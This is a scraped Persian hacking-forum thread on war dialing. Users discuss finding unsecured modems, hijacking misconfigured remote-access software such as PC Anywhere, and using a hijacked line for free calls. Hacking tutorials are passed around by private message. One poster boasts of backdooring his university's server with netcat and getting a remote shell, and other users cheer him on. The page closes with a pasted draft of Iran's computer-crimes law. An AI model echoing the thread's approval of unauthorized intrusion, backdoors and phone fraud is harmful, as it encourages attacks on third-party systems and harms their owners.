war dialing 



x

war dialing



مستقیم کردن لینک های آپلودسنترها - (قوانین در پست اول)
مستقیم سازی لینک آپلودسنترها ๑۩۞۩๑ قوانین در پست اول ๑۩۞۩๑
تاپیک جامع پیرامون انکودرها، ریلیزها و سایت های وارز و ... فایل ضمیمه شده در پست اول مطالعه شود
مستقیم سازی لینک آپلودسنترها ๑۩۞۩๑ قوانین در پست اول ๑۩۞۩๑
ExpressLeech / تاپیک جامع اکسپرس لیچ ▓ توضیحات در پست اول ▓
مستقیم سازی تورنت ๑۩۞۩๑ قوانین در پست اول ๑۩۞۩๑

اشعـار عاشقـانـه
[اختصاصی کاربران] آخرین عکس هایی که گرفتیم (( حجم عکسها حداکثر 300 کیلوبایت))
تاپیک اختصاصی محسن چاوشی
اشعار سکوت، تنهایی و مرگ
شعر گمنام
سخنان كوتاه از بزرگان جهان
حمایت از ما | مشهدهاست
`

war dialing




سلام به همه برو بچه های پی سی ورلد.[/b]
آقا میخواستم یه موضوع بگم هرکی اطلاعاتی داره جواب بده قبلشم بگم که من 30 بار جستجو کردم و بعد از اینکه به نتیجه ای نرسیدم.
من به موضوع واردیالینگ یا دمون دیالینگ علاقه دارم.
میخواستم اگه کسی در موردش چیری میدونه یا منبع توپ و کاملی رو مشناسه معرفی کنه
البته من چیز هایی هم میدونم و با برنامه هایی مثل تی اچ سی اسکن هم کار کردم .ولی بدردم نخورد چون من 2تا کامپیوتر دارم با 2تا خط تلفن هرکاری کردم نتونستم با یکی از کامپوتر ها م با استفاده از واردیالینگ وصل بشم.
یه موضوع دیگه اینه که من با لینوکس هم کار میکنم / یعنی اینکه با این چیز هم مشکل ندارم.
اصلا من میخوام بدونم چه سیستم هایی رو میشه با وار دیالینگ هک کرد؟؟؟؟ :?: :twisted:
ممنون و متشکر.

11-05-2005, 19:34


1:

عزيز جان ورديالينگ فقط براي جستجو هستش وقتي يه مودم آزاد پيدا كردي (منظورم مودم آق مديره هست كه هيچي بلد نيست) اونوقت با يه ديمون ديالر به اون وصل مي شي
البته بعضي وقت ها هم از يه نرم افزارهايي براي استفاده راه دور انتخاب مي كنند كه با تنظيم نادرست اون مي تونيد به اون متصل بشيد

مثل پسي اني ور (ببخشيد پي سي اوري ور) :twisted: :mrgreen:
اين نرم افزار رو رو يكي از سيستم هات نصب كن بعد با سيستم اونوري اسكن كن و ميتوني متصل بشي
بايد توجه داشته باشي كه بايد يه تنظيم نامناسب ريموت بايد پيدا كني تا بتوني به اون متصل بشي . . .
دارم كاملشو PDF مي كنم

2:

راستي يادم رفت

اگه واسه جايي ديگه امتحانش كني بهت گير ميدن
حواست بايد جممممممممم باشه :twisted: :twisted: :twisted:

3:

سلام.
آقا دمت گرم.
ولي با اينايي كه گفتي حدود 1سوال منو جواب دادي ولي سوالهاي بيشتري برام ايجاد شد.
شما گفتي وقتي كه يك مودم آزاد پيدا كردي ميتوني بهش وصل بشي.
خوب مودم من مگه آزاد نيست؟؟
من تمريناتمو در دو حالت انجام ميدادم 1-وقتي با يكي از كامپيوتر ها به اينترنت وصل بودم / كه وقتي با تي اچ سي اسكن ميكردم جواب ميداد(busy).
2-درحالی که به اینترنت وصل نبودم که میزد نو انسور... :?: :?:
در باره پی سی انیور هم اگه میشه یک نرم افزار معرفی کن که بتونم باهاش کار کنم.
بعدشم اینکه اینا خیلی آماتوریه و برنامه های تحت ویندوز هم زیاد قدرت اینجور کارهارو تا این سطح ندارند و فک کنم اگر برنامه ای در لینوکس بتونم پیدا کنم خیلی توپ تر باشه و خطرناکتر. :shock:
ممنون از شما منتظر جوابتون هستم.

4:

برات PM دادم . . .
اگه بتوني با سي برنامه بنويسي تو يونيكس ميتوني خودت يه اسكنر و دمون بسازي البته اگه سي بلد باشي اونم نه حرفه اي بلكه بايد فوق حرفه اي باشي راستي تو لينوكس هم به دليل شباهت ساختاري هم ميتوني استفاده كني
حال كن :twisted:

5:

راستي جواب سوالت - مودم تو آزاد نيست . . . :lol:
مودم آزاد يه مودمه كه خط اون busy نباشه و درست تنظيم نشده باشه - يعني مشكل تنظيمات امنيتي داشته باشه

اگه هم نداشته باشه هنوز هم آزاده ولي بايد پسورد بدي

تو PM كاملتر و بهتر برات فرستادم - اينطوري حداقل كمتر ميخونن :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol:

6:

من یه جایی خوندم کار این برنامه اینه که زنگ میزنه به آی اس پی و بعد آی اس پی زنگ میزنه خونه شما و شما رو وصل می کنه به اینترنت درسته؟

7:

نه وار دیالینگ هم از روش های هکه که دنبال بوق آزاد میگردی و ..... من که بلد نیستم :mrgreen: ولی شنیدم مخابرات زود میفهمه تازه یرم میده

8:

سلام.
با تشكر از شما دوستان.
ان بي اس فاكر عزيز كه معلومه توي اين كار خيلي واردي اين تور كه من از جوابهاي شما فهميدم اگر خط تلفن به مودمي وصل باشه و اون كامپيوتر هم به اينترنت وصل نباشه ميشه بهش وصل شد ولي من در اين صورت هم امتحان كردم ولي جواب نگرفتم :cry: / من فكر مي كنم اگر شما اسم برنامه هايي رو كه من الان بتونم اين كار رو انجام بدم بگي كارم راه بيفته و ممنون ميشم .
مورد ديگه اين كه اگه من سي بلد بودم كه ديگه از اين سوالها نمكردم.
ازشما متشكرم لطفا باز هم در اين مورد بنويسيد.

9:

سلام.
بله زاتانيكس اگه آي اس پي از نظر امنيتي ضعيف باشه (كه توي ايران هست) ميشه. خيلي از كاربر ها تو ايران همينطورند. بنابراين مسله پسورد (كه ان بي اس فاكر ميگه) حل ميشه.(تازه من كه فعلا دارم روي سيستم خودم تمرين ميكنم تا اگه به جايي برسم). :idea:

10:

اگه به جایی رسیدید ما رو هم بی نصیب نگذارید چون اینجا آی اس پی در پیت زیاده :mrgreen:

11:

آقا محمد تي ان تي عزيز
اگه شما يه مودم آزاد يا بوق آزاد پيدا كنيد علاوه بر هك كردن نرم افزار ريموت نصب شده روي اون مي توني با استفاده از مودمش كه بهش وصل شدي شماره گيري كني و ديگه حساب شما با مخابرات بي حساب ميشه يعني يه بوق آزاد حسابي كه خرجي نداره

ضمنا برات يه پي ام فرستادم كه توش يه آدرس آموزش بود اون رو دانلود كني و خوب بخوني ديگه احتياجي به هيچي براي ياد گرفتن نداري
پس خوب بخونش - دمت گرم يه كم وقت بذار :twisted: :mrgreen:

12:

خوب بابا لیکش رو بذارید ما هم بخونیم دیگه
:arrow:

13:

راست ميگه.منم شديدن دوست دارم ببينم اين روش چيه و جه جوري كار ميكنه .

14:

سلام.
آقاي ان بي اس فاكر از شما ممنون و متشكرم به خاطر معرفي اين مقاله ارزشمند.
در این مورد هم بگم من این پست رو قبل از اینکه فایل رو دانلود کنم انجام دادم چون در سایت دانشگاه بودم و نمیتونستم روش کار کنم پس وقت میذارم.
در مورد مقاله هم بگم که خیلی توپ هستش و جایی به این صورت ندیده بودم که اینقدر در مورد جزئیات توضیح داده باشه.
از طرف دیگه هم خوب خیلی مطالبش دیر هضم هستش و باید به صورت همزمان با برنامه های معرفی شده هم کار کنم که فکر کنم خیلی طول بکشه
در آخر از شما خواهش میکنم اگر مقاله هایی از این دست دارید به من معرفی کنید
متشکرم. :mrgreen: :twisted:

15:

داش ممد دارم
ولي به زبان شيرين انگليسي
خواستي بگو تا برات بفرستم . . . :twisted:

16:

عزيزان اگه لينك رو تو اين تاپيگ بذارم قفل ميشه چونكه بطور دقيق آموزش هك گذاشتيم و من دوست ندارم باعث دلخوري يكي از مديران سايت و . . . بشم اگه ميخوايد PM بديد جواب بدم يا از يكي از مديران سايت اجازه آموزش هك رو بگيرين

17:

سلام.
آقا دستت درد نكنه بفرست درسته سخته ولي عيبي نداره.
ولي حيف شد كه نميشه در مورد هك صحبت كرد وگرنه يكي دو سوال درست حسابي داشتم ميخواستم بپرسم.

18:

اقا ممد
دارم اپلود می کنم . . . تموم شد لیبنکهاشو برات پی ام می فررستم :twisted: :arrow: :mrgreen:

19:

داداش این آموزش های یونیکس هم واسه هک خوبه

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

فعلا چهارتاست :!: :!: :mrgreen:

20:

مرسي

21:

نظر یادتون نره :mrgreen:

22:

سلام.
ان بي اس 1سوال در مورد nc برام پيش اومده چطوري ازت بپرسم؟

23:

اینم واسه عشق هک های عزیز
مقدمات هککککک :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
همش نوشته آراز جون یکی از اساتید هک هستش
خواستم لینک بذارم گفتم شاید گیر بدن تبلیغ نکن ما هم اینجوریش رو گذاشتیم
:mrgreen: :mrgreen: :mrgreen:

24:

دیدم هیچ کسی در مورد هک رعایت نمی کنه ما هم دوباره اینها رو گداشتیم
امیدوارم این تاپیک قفل نشه
اینم یه اموزش دیگه واسه عشق هک ها :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
کار من نیست خودتون بخونین می فهمین :lol: :lol:
البته کامل نیست ولی خوبه

25:

بابا دمت گرم. تركوندي هاااااااا
ولي يك كاري كنيم كه تاپيك قفل نشه.
البته اگه قفل كنن خيلي نامرديه چون اولا اين تاپيك خيلي آموزشيه دوما درسا زير اين تاپيك يه تاپيك تابلو هك هستش.
در ضمن ان بي اس فاكر جان(استاد من) سعي كنيم كه بحثمون سر همون وارديالينگ باشه بهتره.

26:

war diallllllling is The Bad Study .......
:mrgreen:

thanks
i dont think for this
OK

you should study HARD For Hacking

27:

nbsfucker, شما مقاله ها را بذار عزيز نترس قفل نميشه

28:

دوست من شرمنده . ولي اين لينك هم كار نداد اگه ميشه دوباره آپلود كنيد.
قربانت :oops:

29:

سلام.
خوب دلم ميخواد يك سري گزارشاتي از كارهايي كه كردم با استاد خودم ان بي اس فاكر بدم.
توي وار ديالينگ كه خيلي پيشرفت كردم ولي خوب اين روشيه كه هر كسي نميتونه باهاش كار كنه ولي به دو دليل تمريناتم توي اين زمينه براي يه مدتي داره قطع ميشه
1:بابا توي اين مقاله فقط درمورد وارديالينگ توضيح داده بود (به قول خود مقاله و شما) در مورد دمون ديالينگ توضيح نداده يعني بعد از وارديالينگ و بدست آوردن هدف با چه برنامه اي و چه كار بايد كرد؟(thc login hacker ) رو هم نتونستم پيدا كنم.
2:امتحانات پايان ترمم داره شروع ميشه ايشالا بعد از 1 ماه ديگه
در مورد نت كت هم خيلي كمك كردي .
من اكونت ادمين سايت دانشگاهمونو پيدا كردم و نت كت رو بصورت بكدور روش نصب كردم و اومدم و از خونه شل سيستم رو در اختيار گرفتم(خيلي خنگن بابا)

30:

OK
That's Very Good



Fuck it Baby :mrgreen: :mrgreen: :mrgreen:

31:

نرم افزار های کنترل رو میخوای ؟

32:

گفتم هک میخونین این رو هم اضافه بکنین شاید بدردتون خورد و دیگه خلاف اینترنتی نکردید :lol:
اینم عاقبت خلاف اینترنتی

پيش نويس آخرين تغييرات قانون مجازات جرايم رايانه‌اي تبــليغـــات

بخش اول: تعاريف
ماده 1- در اين قانون اصطلاحات در معاني ذيل بكار رفته‌اند:
الف- سيستم رايانه‌اي (Computer System)
هر نوع دستگاه يا مجموعه‌اي از دستگاه‌هاي متصل سخت‌افزاري ـ نرم‌افزاري است كه از طريق اجراي برنامه‎هاي پردازش خودكار داده عمل مي‎كند.
ب- سيستم مخابراتي (Communication System)
هر نوع دستگاه يا مجموعه‌ای از دستگاه‌ها برای انتقال الكترونيكي اطلاعات بين يك منبع (فرستنده, منبع نوري) و يك گيرنده يا آشكارساز نوري از طريق يك يا چند مسير ارتباطي بوسيله پروتكل‌هايي كه براي گيرنده قابل فهم و تفسير باشد .
ج- داده رايانه‌اي (Computer Data)
هر نمادي از وقايع، اطلاعات يا مفاهيم به شكلي مطلوب براي پردازش در يك سيستم رايانه‌اي كه شامل برنامه‌اي مناسب است و باعث مي‌شود سيستم رايانه‌اي عملكرد خود را به مرحله اجرا گذارد. داده مورد حمایت قانونی داراي ارزش مالي است.
د- داده محتوا (Content Data)
هر نمادي از موضوعات، مفاهيم يا دستورالعمل‌ها نظير متن، صوت يا تصوير، چه به صورت در جريان يا ذخيره شده كه جهت برقراري ارتباط ميان سيستم‎هاي رايانه‌اي يا پردازش توسط شخص يا سيستم رايانه‌اي بكار گرفته شده و بوسيلة سيستم رايانه‌اي ايجاد شود.
هـ - داده‌ حاصل از تبادل داده محتوا (Traffic Data)
هرگونه داده‌اي كه توسط رايانه‌ها در زنجيره ارتباطات توليد مي‌شود تا ارتباطي را از مبدأ تا مقصد مسيريابي كند و شامل مبدأ ارتباط، مقصد ، مسير، زمان، تاريخ، اندازه، مدت زمان و نوع خدمات اصلي خواهد بود.
و- اطلاعات (Information)
داده‌، متن، تصوير، صدا، كد، برنامه‌ رايانه‌اي، نرم‌افزار و پايگاه داده‌ يا مايكروفيلم يا مايكروفيش ايجاد شده رايانه‌اي مي‌باشد.
ز- اطلاعات مشترك (Subscriber Information)
هر گونه اطلاعاتي كه در دست تأمين كننده خدمات وجود داشته و مربوط به مشترك آن خدمات بوده و شامل نوع خدمات ارتباطي و پيش‌نيازهاي فني و دوره استفاده از آن خدمات، هويت مشترك، آدرس IP يا پستي يا جغرافيايي، شماره تلفن و ساير مشخصات شخصي وي می‌شود.
ح- ارائه‌كننده خدمات (Service Provider)
هر شخص حقيقي يا حقوقي است كه خدماتی را به منظور امكان برقراري ارتباط با شبکه رایانه ای به کاربران فراهم می آورد یا داده رايانه‌اي را به جاي ارائه دهنده خدمات ارتباطي يا كاربران آن پردازش يا ذخيره مي‌كند.
بخش دوم : جرايم و مجازاتها
ماده2- هر كس عمداً و بدون مجوز، با نقض تدابير حفاظتي داده ها يا سيستم‌های رايانه‌اي يا مخابراتي، به آنها دسترسي يابد یا داده‌ها را تحصیل نماید به حبس از نود و يک روز تا يک سال يا جزای نقدی از دو ميليون و پانصد هزار ریال تا ده ميليون ريال محکوم خواهد شد.
ماده3- هر كس عمداً و بدون مجوز داده‌‌هاي در حال انتقال در يك ارتباط خصوصي را در سیستمهای رايانه‌ای يا مخابراتی يا امواج الکترو مغناطيسی یا نوری شنود يا دريافت نمايد به حبس از نود و يك روز تا يك سال يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا ده ميليون ريال محكوم خواهد شد.
ماده 4- هركس عمداً و بدون مجوز نسبت به داده‌هاي سري در حال انتقال يا موجود در سيستم‌هاي رايانه‌اي يا مخابراتي يا در حامل های داده كه واجد ارزش براي امنيت داخلي يا خارجي كشور باشد، مرتكب اعمال زير شود به مجازات‌هاي زير محكوم مي‌گردد:
الف ـ دسترسي به داده‌هاي موضوع اين ماده يا تحصيل آنها به حبس از يك سال تا سه سال و جزاي نقدي از ده ميليون ریال تا سی ميليون ريال ب ـ قرار دادن داده‌هاي مذكور در دسترس اشخاص فاقد صلاحيت دسترسي به حبس از دو سال تا ده سال
ج ـ افشا يا قرار دادن داده‌هاي مذكور در دسترس دولت، سازمان، شركت، قدرت و يا گروه بيگانه يا عاملين آنها به حبس از پنج سال تا پانزده سال تبصره1ـ داده‌هاي سّري، داده‌هايي هستند كه افشای آنها می‌تواند به امنيت كشور و يا منافع ملي صدمه وارد کند
تبصره 2ـ آيين نامه طرز تعيين و تشخيص داده‌هاي سّري و حفاظت آنها ظرف سه ماه از تاريخ تصويب اين قانون توسط وزارت دادگستري و با همكاري وزارتخانه‌هاي كشور، اطلاعات، ارتباطات و فناوری اطلاعات و دفاع وپشتيباني نيروهاي مسلح تهيه و به تصويب هيئت وزيران خواهد رسيد.
ماده 5 - هر كس به قصد دسترسي به داده‌هاي سّري موضوع ماده 4 با نقض تدابير امنيتي، به سيستم‎هاي رايانه‌اي یا مخابراتي مربوط دست يابد به حبس از شش ماه تا دو سال يا جزاي نقدي از پنج ميليون ریال تا بيست ميليون ريال محكوم خواهد شد.
ماده 6 - هر يك از مأمورين دولتي كه به ‌نحوي امين یا مسئول حفظ امنيت و يا حفاظت فني داده‌هاي موضوع ماده 4 اين قانون و يا سيستم‌هاي موضوع ماده 5 باشند و در اثر بي‌احتياطي، بي‌مبالاتي و يا عدم رعايت اصول حفاظتي سبب دسترسي اشخاص فاقد صلاحيت دسترسي به داده‌ها، حامل¬های داده و يا سيستم‌هاي مذكور گردند، به حبس از شش ماه تا دو سال يا جزاي نقدي از پنج ميليون ريال تا بيست ميليون ريال و انفصال موقت از خدمات دولتی از شش ماه تا پنج سال محکوم می‌گردد.
ماده 7- هر كس به قصد تقلب، داده‌هاي رايانه‌اي یا مخابراتي داراي ارزش اثباتي را تغيير داده يا ايجاد ، حذف يا متوقف نمايد، مرتكب جعل رايانه‌اي بوده و علاوه بر جبران خسارت وارده، به حبس از يك سال تا 5 سال يا جزاي نقدي از ده ميليون تا پنجاه ميليون ريال محكوم خواهد شد.
ماده 8- هركس داده‌هاي مذكور در ماده 7 را با علم به مجعول بودن آنها، مورد استفاده قرار دهد، علاوه بر جبران خسارات وارده به حبس از يك‌سال تا پنج سال و يا جزاي نقدي از ده ميليون ریال تا پنجاه ميليون ريال محكوم خواهد شد. ماده 9- هر کس به قصد تقلب با ايجاد، تغيير، متوقف کردن يا از بين بردن داده‌ها يا ساير علايم و کدهاي قابل پردازش در سيستم رايانه‌ای يا مخابراتی، کارت‌های اعتباری يا مغناطيسی يا ساير کارت‌های قابل پردازش يا مورد استفاده در سيستم‌هاي مزبور را جعل نمايد يا با اعمال فوق نسبت به آنها مرتکب تقلب گردد به حبس از شش ماه تا سه سال يا جزای نقدی از پنج ميليون ريال تا سی ميليون ريال محکوم خواهد شد.
ماده 10- هر كس به قصد اضرار، داده‌هاي ديگري را از سيستم رايانه‌اي يا مخابراتي يا ازحامل‌هاي داده پاك نمايد يا صدمه بزند يا دستكاري كند يا غير قابل استفاده نمايد و يا به هر نحو تخريب يا مختل نمايد به طوري كه منتهي به ضرر غير شود به حبس از شش ماه تا دو سال و يا جزاي نقدي از پنج ميليون ریال تا بيست ميليون ريال محكوم مي‌گردد.
ماده 11- هر كس عمداً با انجام اعمالي از قبيل وارد كردن، انتقال دادن، ارسال، پخش، صدمه زدن، پاك كردن، ايجاد وقفه، دستكاري يا تخريب داده‌ها يا امواج الكترومغناطيسي یا نوری، سيستم رايانه‌اي يا مخابراتي ديگري را از کار بیندازد یا کارکرد آنها را مختل نمايد به حبس از شش ماه تا دو سال و يا جزاي نقدي از پنج ميليون ریال تا بيست ميليون ريال محكوم مي‌گردد.
ماده 12- هر كس عمداً از طريق سيستم رايانه‌اي يا مخابراتي يا بوسيله امواج الكترومغناطيسي و با انجام اعمالي از قبيل مخفي كردن داده‌ها، تغيير رمز ورود ويا رمزنگاري داده‌‌ها، مانع دستيابي اشخاص مجاز به داده‌ها يا سيستم رايانه‌اي يا مخابراتي گردد به حبس از نود و يك روز تا يك سال و يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا ده ميليون ريال محكوم مي‌گردد.
ماده 13- هر كس با انجام اعمالي نظير وارد كردن، تغيير، محو، ايجاد، توقف داده‌ها يا اختلال در کارکرد سيستم و نظاير آن، از سيستم رايانه‌اي يا مخابراتي سوء استفاده نمايد و از اين طريق وجه يا مال يا منفعت يا خدمات مالي يا امتيازات مالي براي خود يا ديگري تصاحب يا تحصيل كند در حكم كلاهبردار محسوب و علاوه بر رد اصل مال به حبس از يك سال تا هفت سال و جزاي نقدي معادل وجه يا مال يا قيمت منفعت يا خدمات مالي يا امتيازات مالي كه تحصيل كرده است، محكوم مي‌شود.
تبصره: مجازات شروع به اين جرم ، حداقل مجازات حبس مقرر خواهد بود. ماده 14- هر کس از کارت‌های موضوع ماده 9 اين قانون سوء استفاده نمايد و از اين طريق مال يا وجه یا منفعت يا خدمات مالی يا امتیازات مالی تحصيل يا تصاحب کند، علاوه بر جبران خسارات وارده به حبس از يک تا سه سال و جزای نقدی معادل وجه يا مال يا قيمت منفعت يا خدمات مالی يا امتيازات مالی که تحصيل کرده است، محکوم می‌گردد.
ماده 15- هر كس از طريق سيستم رايانه‌اي يا مخابراتي محتويات مستهجن از قبيل نمايش اندام جنسي زن و مرد يا نمايش آميزش يا عمل جنسي انسان يا انسان با حيوان را توليد كند يا منتشر سازد يا مورد هر قسم معامله قرار دهد، به حبس از نود و يك روز تا يك سال يا جزاي نقدي از دو ميليون و پانصد هزار تا ده ميليون ريال و يا به هر دو مجازات محكوم خواهد شد.
تبصره1: چنانچه محتويات موضوع اين ماده در دسترس اشخاص زير 18 سال تمام قرار داده شود يا براي آنها منتشر يا ارائه گردد مرتكبين به حداكثر يك يا هر دو مجازات مقرر محكوم خواهند شد.
تبصره2: توليد محتويات غيرواقعی (از طريق پويا نمايی، طراحی و نقاشی) با قصد انتشار يا معامله مشمول مقررات اين ماده است.
ماده 16- هر كس از طريق سيستم رايانه‌اي يا مخابراتي مرتكب اعمال زير شود، در مورد جرايم موضوع بند الف به حبس از يك سال تا سه سال يا پرداخت جزاي نقدي از سه ميليون تا پانزده ميليون ريال يا به هر دو مجازات و در مورد جرايم موضوع بند ب و ج به حبس از نود و يك روز تا يك سال يا جزاي نقدي از دو ميليون و پانصد هزار تا ده ميليون ريال يا به هر دو مجازات محكوم خواهد شد.
الف) محتويات مستهجن از قبيل نمايش اندام جنسي يا نمايش آميزش يا عمل جنسي اشخاص زير 18 سال تمام توليد يا ارايه يا منتشر يا ذخيره‌سازي يا تهيه يا در دسترس ديگران قرار دهد.
ب ) به منظور دستيابي اشخاص زير 18 سال تمام به محتويات موضوع بند الف اين ماده يا ماده قبل، مبادرت به تبليغ يا تحريك يا تشويق يا دعوت يا فريب يا تهديد آنها نموده يا طريق دستيابي به محتويات مذكور را تسهيل نموده يا آموزش دهد.
ج) به منظور ارتكاب جرايم و انحرافات جنسي يا ساير جرايم يا خودكشي يا استعمال مواد روانگردان اشخاص زير 18 سال تمام را آموزش داده يا تبليغ يا تحريك يا تهديد يا تشويق يا دعوت نموده يا فريب دهد يا طريق ارتكاب يا استعمال آنها را تسهيل نمايد يا آموزش دهد.
تبصره 1: توليد يا ذخيره‌سازي يا تهيه محتويات غير واقعي چنانچه به قصد ارايه يا انتشار يا قرار دادن در دسترس ديگران نباشد از شمول اين ماده مستثني است.
تبصره2: مفاد دو ماده فوق شامل آن دسته از محتوياتي كه براي استفاده متعارف علمي يا هر مصلحت عقلايي ديگر ارايه مي‌گردد، نخواهد بود. ماده 17- هر كس از طريق سيستم رايانه‌اي يا مخابراتي فيلم يا تصوير يا صوت ديگري را تغيير دهد يا تحريف نمايد و منتشر سازد يا با علم به تحريف يا تغيير، انتشار دهد، به نحوي كه منجر به هتك حرمت يا ضرر وی گردد به حبس از نود ويك روز تا شش ماه يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا پنج ميليون ريال محكوم خواهد شد.
تبصره: ارتكاب جرم موضوع اين ماده نسبت به مقام رهبري يا رؤساي قواي سه گانه مستوجب حداكثر حبس يا جزاي نقدي مقرر در اين ماده خواهد بود. ماده 18- هر كس از طريق سيستم رايانه‌‌اي يا مخابراتي فيلم يا تصوير يا صوت يا اسرار خصوصي يا خانوادگي ديگري را بدون رضايت او منتشر نمايد يا در دسترس ديگران قرار دهد، به نحوي كه منجر به ضرر وی گردد يا عرفاً موجب هتك حيثيت او شود به حبس از نود و يك روز تا شش ماه يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا پنج ميليون ريال محكوم خواهد شد.
ماده 19- هر كس از طريق سيستم رايانه‌اي يا مخابراتي اكاذيبي را منتشر نمايد يا در دسترس ديگران قرار دهد يا اعمالي را بر خلاف حقيقت راساً يا به عنوان نقل قول به شخص حقيقي يا حقوقي يا مقامات رسمي نسبت دهد به نحوي كه موجب تشويش اذهان عمومي يا مقامات رسمي يا ضرر وی شود، علاوه بر اعاده حيثيت به حبس از سه ماه و يك روز تا شش ماه يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا پنج ميليون ريال محكوم خواهد شد. تبصره: جرايم موضوع مواد 17 (به اسثتثناي تبصره اين ماده) 18 و 19 (به استثناي نشر يا در دسترس قرار دادن اكاذيب يا نسبت دادن اعمال خلاف حقيقت كه موجب تشويش اذهان عمومي يا مقامات رسمي گردد) جز با شكايت شاكي خصوصي تعقيب نمي‌شود و با گذشت وي تعقيب موقوف خواهد شد.
ماده 20- ايجادكنندگان نقطه تماس بین‌المللي (ICP) موظفند امكان دستيابي به محتويات موضوع ماده 15 وبند الف ماده 16 را متوقف سازند، در غير اينصورت به مجازات مقرر در مادة 25 این قانون محكوم خواهند شد، ساير ارائه‌كنندگان خدمات اينترنتي نيز كه با علم به تخلف اشخاص فوق، خدماتي را دريافت و امكان دستيابي به اين محتويات را فراهم نمايند به مجازات فوق محكوم خواهند شد.
ماده 21- به منظور جلوگيري از ادامة ارائه يا انتشار محتويات موضوع مواد 15 و بند الف ماده 16 ارائه‌كنندگان خدمات ميزباني (Hosting) موظفند: الف ـ نسبت به محتوای موجود درسايت‌های تحت ميزبانی خود نظارت نمايند، چنانچه عدم نظارت يا بي مبالاتي وی در نظارت منجر به ادامة ارائه يا انتشار محتويات فوق گردد به مجازات مقرر در ماده 25 همين قانون محكوم خواهند شد.
ب ـ به محض اطلاع از وجود محتويات فوق در هر يك از سيستم‌هاي تحت ميزبانی خود مراجع قضايی يا انتظامي را مطلع نموده و اقدامات لازم را در جهت توقف و در صورت امكان حفاظت از داده‌هاي مربوطه به عمل آورند. در غير اين صورت به مجازات مقرر در ماده 25 همين قانون محکوم خواهند شد. تبصره: تعيين مقررات موضوع اين ماده بر اساس آئين‌نامه‌ای است که توسط وزارت دادگستری با همکاری وزارت ارتباطات و فناوری اطلاعات ظرف سه ماه از تاريخ تصويب اين قانون تهيه شده و به تصويب هيأت دولت خواهد رسيد.
ماده 22- هر كس مرتكب اعمال ذيل گردد، به حبس از نود و يك روز تا يك سال يا جزاي نقدي از دو ميليون و پانصد هزار ریال تا ده ميليون ريال محکوم می‌گردد. الف ـ توليد، انتشار، توزيع، يا مورد معامله قرار دادن داده‎ها يا نرم‎افزارها يا هر نوع وسايل الكترونيكي كه صرفاٌ جهت ارتكاب يکی از جرايم رايانه‎اي مورد استفاده قرار مي‎گيرند.
ب ـ فروش، انتشار رمز عبور، كد دستيابي يا داده‎هاي رايانه‎اي به طور غيرمجاز به نحوي كه به وسيلة آن سيستم رايانه‎اي يا مخابراتي يا داده‎هاي مربوطه قابل دستيابي باشد. تبصره: چنانچه مرتكب اعمال فوق را حرفة خود قرار داده باشد، به هر دو مجازات محكوم خواهد شد. ماده 23- در موارد زير، چنانچه جرايم رايانه‎اي مندرج در اين قانون، تحت نام شخص حقوقي و در راستاي منافع آن ارتكاب يابد، شخص حقوقي داراي مسؤوليت كيفري خواهد بود: الف ـ هرگاه مدير شخص حقوقي مرتكب يكي از جرايم مندرج در اين قانون شود.
ب ـ هرگاه مدير شخص حقوقي دستور ارتكاب يكي از جرايم مندرج در اين قانون را صادر نمايد و جرم بوقوع پيوندد.
ج ـ هرگاه يكي از كارمندان شخص حقوقي، با اطلاع مدير يا در اثر عدم نظارت وي، مرتكب يكي از جرايم مندرج در اين قانون شود.
د ـ هرگاه مدير، در ارتكاب يكي از جرايم مندرج در اين قانون معاونت نمايد. هـ ـ هرگاه تمام يا قسمتي از موضوع فعاليت عملي شخص حقوقي، به ارتكاب يكي از جرايم موضوع اين قانون اختصاص يافته باشد.
تبصره 1- منظور از مدير در اين ماده هر شخصي است كه اختيار نمايندگي يا تصميم‎گيري يا نظارت بر شخص حقوقي را دارا مي‎باشد.
تبصره 2- مسؤوليت كيفري شخص حقوقي مانع مجازات مرتكب نخواهد بود. ماده 24- اشخاص حقوقي موضوع مادة فوق، با توجه به شرايط و اوضاع و احوال جرم ارتكابي، ميزان درآمد و نتايج حاصله از ارتكاب جرم، به ترتيب ذيل محكوم خواهند شد:
الف ـ سه تا شش برابر حداكثر جزاي نقدي جرم ارتكابي؛
ب ـ چنانچه حداكثر مجازات حبس آن جرم تا پنج سال باشد، تعطيلي موقت شخص حقوقي از يک تا 9 ماه؛
ج ـ چنانچه حداكثر مجازات حبس آن جرم بيش از پنج سال باشد تعطيلی موقت شخص حقوقی از يک تا سه سال و در صورت تکرار جرم منحل خواهد شد. تبصره1ـ مدير شخص حقوقي كه مطابق بند 3 اين ماده منحل مي‎شود تا سه سال حق تأسيس يا نمايندگي يا تصميم‎گيري يا نظارت بر شخص حقوقي ديگر را نخواهد داشت.
تبصره 2ـ خسارات شاكي خصوصي از اموال شخص حقوقي جبران خواهد شد. در صورتي كه اموال شخص حقوقي به تنهايي تكافو نكند، مابه‎التفاوت از اموال مرتكب جبران خواهد شد.
ماده 25- متخلفين از بند ب ماده 21 و مواد 30، 31 و32 این قانون به حبس از نود و يك روز تا يك سال يا پرداخت جزاي نقدي از ده ميليون تا صد ميليون ريال محكوم خواهند شد.
ماده 26- هرگاه مرتكبين جرايم موضوع اين قانون قبل از كشف جرم يا دستگيري، مأمورين تعقيب را از وقوع جرم مطلع نمايند يا به نحو مؤثري در كشف جرم كمك و راهنمايي كنند يا موجبات تعقيب ساير مرتکبين را فراهم آورند و يا خسارت وارده را جبران كنند در مجازات آنان تخفيف داده خواهد شد يا مجازات حبس حسب مورد معلق خواهد شد و در جرايم موضوع ممانعت در دسترسی ،دسترسي غيرمجاز ، شنود غيرمجاز ، تخريب داده‌ها يا اختلال در سيستم و جعل كامپيوتري دادگاه مي‌تواند مرتكب را از مجازات مقرر معاف نمايد.
